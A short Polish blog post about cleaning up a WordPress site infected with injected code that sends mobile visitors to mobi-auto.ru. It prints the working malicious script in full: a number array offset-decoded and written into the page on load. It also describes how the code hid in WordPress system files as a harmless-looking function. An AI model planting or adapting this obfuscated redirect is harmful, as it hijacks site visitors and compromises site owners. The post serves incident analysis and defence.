Ostatnio natrafiłem na bardzo uparty przypadek wstrzyknięcia kodu. Działający kod przekierowywał ofiary wybraną witrynę. Oczywiście wynikowego kodu, próżno szukać w źródłach strony czy wpisach w bazie danych. Zainfekowany kod nie był również dołączony w postaci nowego pliku. Nie było śladów modyfikacji istniejących plików, gdyż daty plików były zachowane względem pozostałych plików z folderów. Wynikiem działania wstrzykniętego kodu było to:
1 |
<script type="text/javascript">var a8ecd01=[652,712,752,757,770,684,767,768,773,760,753,713,686,764,763,767,757,768,757,763,762,710,684,749,750,767,763,760,769,768,753,711,684,760,753,754,768,710,697,701,700,700,689,711,684,768,763,764,710,700,689,711,684,771,757,752,768,756,710,701,700,700,689,711,684,756,753,757,755,756,768,710,701,700,700,689,711,686,714,662,712,757,754,766,749,761,753,684,767,766,751,713,686,756,768,768,764,710,699,699,761,763,750,757,697,749,769,768,763,698,766,769,699,707,699,686,714,712,699,757,754,766,749,761,753,714,662,712,699,752,757,770,714];var b8ecd02="";for (var i=1; i<a8ecd01.length; i++) {b8ecd02+=String.fromCharCode(a8ecd01[i]-a8ecd01[0]);} document.write(b8ecd02);</script> |
Kod ten przenosi wszystkich odwiedzających z urządzeń mobilnych na stronę mobi-auto.ru
Wstrzyknięty kod, był bardzo sprytnie ukryty, wśród plików systemowych wordpress, udając jedną z funkcji systemu. Nazwa funkcji była odpowiednio dobrana do pliku jej umieszczenia, więc podczas ręcznego przeglądania nie wyróżniałą się zbyt mocno.
Finalnie kod został zlokalizowany i usunięty z systemu.